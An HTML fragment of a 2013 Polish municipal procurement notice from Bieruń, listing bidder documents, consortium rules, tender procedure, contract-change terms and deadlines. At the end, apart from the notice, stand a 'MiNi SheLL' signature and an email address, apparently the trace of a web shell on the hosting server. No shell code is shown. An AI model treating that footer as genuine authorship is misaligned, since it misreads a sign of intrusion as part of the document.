<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A)Wykonawca przystępujący do postępowania złoży następujące oświadczenie z art. 22 ust. 1 ustawy pzp, że:
1.	Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	Posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B)1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz w pkt. Lista wymaganych dokumentów.
Zamiast dokumentu, o którym mowa w punkcie  3 Listy wymaganych dokumentów  wykonawca przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.
       Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub 
        miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
        dokumentem zawierającym oświadczenie , w którym określa się także osoby uprawnione do 
        reprezentacji wykonawcy złożone przed, właściwym organem sądowym, administracyjnym albo 
        organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania  
        osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed 
        notariuszem.        .
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa wyżej.
  2)    Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
  3)    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  
          innych podmiotów , na zasobach których wykonawca polega na zasadach określonych 
          w art.26 ust. 2b ustawy pzp , kopie dokumentów dotyczących odpowiednio wykonawcy lub 
          podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te 
          podmioty.
4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.


       Treść zobowiązania podmiotu trzeciego (złożonego w oryginale)powinna określać:
       -  kto jest podmiotem przyjmującym zasoby,
       -  zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, 
          którymi wykonawca będzie dysponował przy realizacji zamówienia),
       -  czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy 
          realizacji zamówienia ( w realizacji której części zamówienia będzie brał udział podmiot trzeci  
          i w jakiej formie np. podwykonawstwo),
       -  jakiego okresu dotyczy zobowiązanie.
       W sytuacji  gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich
       udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu 
       w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa
       tego podmiotu w wykonaniu zamówienia.
   5)   Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących          
          sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny  
          dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
          warunku.
 6)   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 
       (np. konsorcjum) do oferty należy dołączyć: 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera),  jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności:
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  
i   udzielających pełnomocnictwa, 
- 	nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- 	czas trwania (zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie    zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- 	cel zawarcia (wspólny udział w postępowaniu przetargowym i wspólną realizację zamówienia publicznego),
-	datę udzielenia pełnomocnictwa,
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby 
warunki, o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.  
c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2  Listy wymaganych dokumentów, powinny być złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. 
d) Dokumenty wymienione w pkt. V B ppkt. 3,4  i 5 Listy wymaganych dokumentów składa każdy                           z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
C)Do oferty zaleca się załączyć informacje w zakresie części zamówienia, która zostanie 
  powierzona podwykonawcom.
       W przypadku braku złożenia informacji w tym zakresie zamawiający uzna, że wykonawca 
       wykona całość zamówienia siłami własnymi,  bez  powierzenia części zamówienia 
       podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z wykonawcą umowy w zakresie:
1)	wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie  
z obowiązującą stawką;
2)	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem wymagań określonych  w SIWZ, jakie osoby te powinny spełniać;
3)	terminu realizacji, w szczególności spowodowane: 
         absencją chorobową, zmianą przepisów, przedłużającymi się procedurami administracyjnymi, 
         związanymi  z uzyskaniem koniecznych uzgodnień, opinii, decyzji i pozwoleń, wystąpienia 
         środków ochrony prawnej w postępowaniu o zamówienie publiczne;
4)	mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
5)	zmian, w przypadku gdy konieczność ich wprowadzenia będzie następstwem zmian lub wytycznych instytucji  uzgadniających dokumentację;
6)	innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - SEKRETARIAT (pok. nr 9, I piętro, segment A) 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com